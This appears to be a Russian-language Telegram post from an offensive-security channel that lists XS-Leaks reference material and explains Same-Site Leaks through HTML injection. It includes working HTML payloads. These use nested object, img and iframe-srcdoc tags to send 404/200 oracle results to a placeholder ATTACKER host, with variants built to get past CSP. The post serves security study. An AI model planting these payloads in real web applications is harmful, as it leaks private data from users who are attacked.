TGViewer
HaHacking HaHacking @hahacking · 2.42K subscribers
Post #70 3.02K
⚙️   #заметки #offense #web

Не отходя от Client-Side атак, захотелось-таки сохранить здесь материалы по XS-Leaks / Cross-Site Leaks; :)

➡️"Библии":

   🧩   xsleaks/xsleaks  💻  🧩   xsleaks.dev

   🧩   [OWASP] Cross-site leaks Cheat Sheet


➡️Дополнения:

Introduction to Cross-Site Leaks
XS-Leaks Attacks and Prevention
[PortSwigger]  Latest cross-site leak news

xsinator.com
▪️testing.html➖ тест браузера на уязвимость к 38 векторам XS-Leaks;


➡️Любопытные дополнения:

From XS-Leaks to SS-Leaks Using object

"SameSite: Lax" cookie затрудняют эксплуатацию XS-Leaks. Но если веб-приложение уязвимо к HTML Injection, можно воспользоваться идеей XS-Leaks для проведения похожей boolean-based атаки (SS-Leaks / Same-Site Leaks) и извлечения информации от лица атакуемого пользователя;

▪️ <iframe> обновляет своё содержимое вне зависимости от кода ответа
▪️ <object> НЕ обновляет своё содержимое при 404


▪️HTML Injection без особой CSP:

[ Результаты ]

➡️ Есть запрос к ATTACKER/api/v1/leaky?secret=a вернул 404
➡️ Нет запроса к ATTACKER/api/v1/leaky?secret=a вернул 200

<object data="/api/v1/leaky?secret=a">
<object data="https://ATTACKER?callback=a">
</object>
</object>


▪️HTML Injection в видимой области➕CSP блокирует внешние объекты:

[ Пример CSP➕Результаты ]

Content-Security-Policy: default-src 'self'; img-src *;

➡️ Есть запрос к ATTACKER/api/v1/leaky?secret=a вернул 404
➡️ Нет запроса к ATTACKER/api/v1/leaky?secret=a вернул 200

<object data="/api/v1/leaky?secret=a">
<img src="https://ATTACKER?callback" loading="lazy">
</object>


▪️HTML Injection НЕ в видимой области➕CSP блокирует внешние объекты:

[ Результаты ]

➡️ Запрос с callback=0/api/v1/leaky?secret=a вернул 404
➡️ Запрос с callback=1/api/v1/leaky?secret=a вернул 200

<object data="/api/v1/leaky?secret=a">
<iframe srcdoc="<img srcset='https://ATTACKER?callback=1 480w, https://ATTACKER?callback=0 800w' sizes='(min-width: 1000px) 800px, (max-width 999px) 480px'>" width="1000px">
</object>



   @HaHacking  🐇
  • ❤ 15
  • 🎃 3
More from @hahacking
  1. Aug 7, 2026🌿 #infrastructure #offense #заметки ➡Видели же целую серию Linux LPE, ± аналогичных небез…
  2. Jul 30, 2026👩‍💻 #web #offense #заметки #события ➡wp2shell — unauth RCE чейн, уязвимы WordPress'ы вер…
  3. Jul 27, 2026ХАХАКИНГ – ВСЁ! ⚡️ #события #заметки #offense #infrastructure #web #ai ➡️Ладно, шучу. Пока…
  4. Feb 9, 2026🍾 #web #enumeration #offense #инструменты ➡️Сравнение 3 инструментов для обнаружения HTTP…
  5. Feb 4, 2026✈️ #web #offense #заметки ➡️Красивый Account Takeover при аутентификации в сервисе через T…
  6. Jan 29, 2026🦞 #события #ai #web #offense ➡Простите, но продолжение; Хочется обсудить ещё несколько пр…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →